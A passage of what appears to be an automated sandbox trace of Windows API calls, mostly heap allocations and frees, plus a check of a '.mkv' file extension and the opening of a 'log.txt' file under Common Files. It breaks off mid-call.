lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0193.142] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0193.144] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0193.144] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0193.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0193.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0193.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0193.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0193.145] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0193.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0193.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.146] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0193.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.147] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0193.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0193.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0193.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.148] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0193.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0193.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0193.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0193.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0193.149] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0193.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0193.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0193.150] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0193.150] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.150] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0193.150] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.150] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0193.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0193.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.151] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, 